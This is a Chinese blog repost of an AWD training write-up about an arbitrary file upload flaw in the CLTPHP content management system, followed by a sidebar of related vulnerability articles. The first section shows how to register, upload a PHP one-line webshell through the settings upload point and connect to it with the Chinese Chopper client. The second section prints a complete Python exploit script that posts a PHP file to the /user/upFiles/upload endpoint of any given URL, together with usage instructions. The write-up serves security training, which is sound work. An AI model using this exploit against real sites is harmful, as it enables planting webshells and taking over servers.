CLTPHP 漏洞

最新推荐文章于 2022-12-19 15:07:43 发布
最新推荐文章于 2022-12-19 15:07:43 发布
阅读量575 收藏
点赞数
文章标签: php python
原文链接:http://www.cnblogs.com/unixcs/p/11244463.html
版权

前言

awd小组的第一次训练

0x01

首先看一下主界面
1619145-20190725143013265-1445885038.png

使用的应该是PHP模板,随便翻一下找到一个注册界面
1619145-20190725143319315-107501411.png

随便注册一个用户,登陆后在设置里找到一个上传点
1619145-20190725143838436-1523023949.png

上传我们的一句话木马
1619145-20190725144514072-637022879.png

查看返回包,上传成功
1619145-20190725144807628-1018613579.png

访问失败,猜测返回路径可能不是绝对路径
1619145-20190725145226446-2107074733.png
通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success!
1619145-20190725145716693-1711890452.png
菜刀连接
1619145-20190725160632134-1616614081.png

0x02

换个思路,网站应该是开源的,百度搜一下关键词,找到一个 payload

#!/usr/bin/python
#-*- coding: UTF-8 -*-
#Author:Bypass
#Date:2018.03.01
import requests
import sys

def CLPHP_upload(url):
        header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' ,
                                'X-Requested-With': 'XMLHttpRequest',} 
        geturl = url+"/user/upFiles/upload"
        files ={'file':('1.php',open('1.php','rb'),'image/jpeg')}
        res = requests.post(geturl, files=files,headers=header)
        print res.text

if __name__ == "__main__":
        if len(sys.argv) == 2:
                url=sys.argv[1]
                CLPHP_upload(url)
                sys.exit(0)
        else:
                print ("usage: %s xxx.com " % sys.argv[0])
                sys.exit(-1)

使用方法:把payload.py和一句话.php放到同一文件夹下,
1619145-20190725153254217-79267921.png

cmd执行 python payload.py url
1619145-20190725155717522-1632245050.png

转载于:https://www.cnblogs.com/unixcs/p/11244463.html

a674212706
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【实战篇】第14篇:CLTPHP_v5.5.3 前台任意文件上传漏洞1
08-03
1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行: 2、文件位置:/think/library/think/Fi
CLTPHP 5.8 后台任意文件删除漏洞
weixin_50464560的博客
09-16 928
CLTPHP 5.8 后台任意文件删除漏洞 一、漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二、漏洞影响 CLTPHP 5.8及之前版本 三、复现过程 漏洞分析 app/admin/controller/Database.php 第221-248行: public function delSqlFiles() { $batchFlag = input('param.batchFlag', 0, 'intval'); //批量删除 if
代码审计-5 XXE漏洞
最新发布
xhscxj的博客
12-19 136
进行替换,并将替换后的内容进行返回。格式内容转换为数组格式赋值给。
【代码审计】CLTPHP_v5.5.3后台任意文件下载漏洞分析
12-02 947
  0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123...
php 目录遍历漏洞,【代码审计】CLTPHP_v5.5.3后台目录遍历漏洞分析
weixin_30910583的博客
03-10 203
2、publicfunctionimages(){3、$path=$this->publicpath.'images/'.input('folder').'/';4、$uppath=explode('/',input('folder'));5、$leve=count($uppath)-1;6、unset($uppath[$leve]);7、...
CLTPHP v6.0
10-02
CLTPHP v6.0是一款基于ThinkPHP5框架构建的后台管理系统,专为网站管理和维护设计。这个系统包含了丰富的功能模块,旨在提供一站式的解决方案,让网站管理变得更加便捷和高效。 首先,CLTPHP的核心是权限管理。它...
CLTPHP v5.5.2
11-26
CLTPHP后台管理系统,包含权限管理,网站基本设置,模型管理,网站内容管理,会员管理,广告管理,留言管理,友情链接等相关模块。基于ThinkPHP5开发,后台采用Bootstrap框架,实现完
CLTPHP v5.7.4
10-05
CLTPHP v5.7.4 是一个专为构建后台管理系统设计的开源框架,它集成了多种功能模块,便于开发者快速搭建和管理网站。这个版本是基于强大的PHP框架ThinkPHP5构建的,提供了丰富的功能和良好的用户体验。 首先,CLTPHP...
CLTPHP v2.2
12-03
CLTPHP后台管理系统,包含权限管理,网站基本设置,模型管理,网站内容管理,会员管理,广告管理,留言管理,友情链接等相关模块。基于ThinkPHP5开发,后台采用Bootstrap框架,实现完全自适应。 ThinkPHP5基于PHP5.4...
PHP-fpm 远程代码执行漏洞复现(CVE-2019-11043)
whojoe的博客
06-23 409
PHP-fpm 远程代码执行漏洞复现(CVE-2019-11043)环境搭建漏洞复现参考文章 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/php/CVE-2019-11043/ 启动容器 docker-compose up -d 查看容器 docker ps 访问http://12
CLTPHP-CLTPHP内容管理系统
06-30
网络信贷起源于英国,随后发展到美国、德国和其他国家,其典型的模式为:网络信贷公司提供平台,由借贷双方自由竞价,撮合成交。 P2P网贷平台仅为借贷双方提供信息流通交互、信息价值认定和其他促成交易完成的服务,不实质参与到借贷利益链条之中,借贷双方直接发生债权债务关系, 网贷平台则依靠向借贷双方收取一定的手续费维持运营。 P2P是英文peer to peer的缩写,意即“个人对个人”。
CLTPHP 后台管理系统 v5.5.3
11-25
CLTPHP后台管理系统,包含权限管理,网站基本设置,模型管理,网站内容管理,会员管理,广告管理,留言管理,友情链接等相关模块。基于ThinkPHP5开发,后台采用Bootstrap框架,实现完
cltphp8.12
03-23
php 插件,很牛批、、用用看、、好用到不行、、啥都成做、、万能的
【代码审计】CLTPHP_v5.5.3 前台任意文件上传漏洞
10-28 1343
0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin 密码:admin123 测试网站首页:...
【代码审计】CLTPHP_v5.5.3前台XML外部实体注入漏洞分析
12-02 751
0x01 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123 测...
php getshell,CLTPHP_v5.5.3 前台Getshelll漏洞
weixin_36277530的博客
03-10 2395
默认后台地址: http://127.0.0.1/admin/login/index.html默认账号密码: 后台登录名:admin 密码:admin123代码分析1、漏洞文件位置:/app/user/controller/UpFiles.php 第5-25行:在这段函数中,未经用户权限验证,获取表单内容,存在越权绕过上传的情况。我们继续跟进move函数:2、文件位置:/think/library...
【代码审计】CLTPHP_v5.5.3后台任意文件删除漏洞分析
12-02 447
  0x00 环境准备 CLTPHP官网:http://www.cltphp.com 网站源码版本:CLTPHP内容管理系统5.5.3版本 程序源码下载:https://gitee.com/chichu/cltphp 默认后台地址: http://127.0.0.1/admin/login/index.html 默认账号密码: 后台登录名:admin  密码:admin123...
【代码审计】YzmCMS_PHP_v3.6 任意文件删除漏洞分析
12-03 1327
  0x00 环境准备 YzmCMS官网:http://www.yzmcms.com/ 程序源码下载:http://pan.baidu.com/s/1pKA4u99 测试网站首页:   0x01 代码分析 1、文件位置: /application/member/controller/member.class.php 第118-132行中: public functio...
php被植入木马文件,php网站被挂木马修复方法总结
weixin_32620265的博客
03-20 967
/**************PHP Web木马扫描器************************//* [+] 作者: alibaba *//* [+] QQ: 1499281192 * www.bKjia.c0m//* [+] MSN: weeming21@hotmail.com *//* [+] 首发: t00ls.net , 转载请注明t00ls *//* [+] 版本: v1.0 *...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值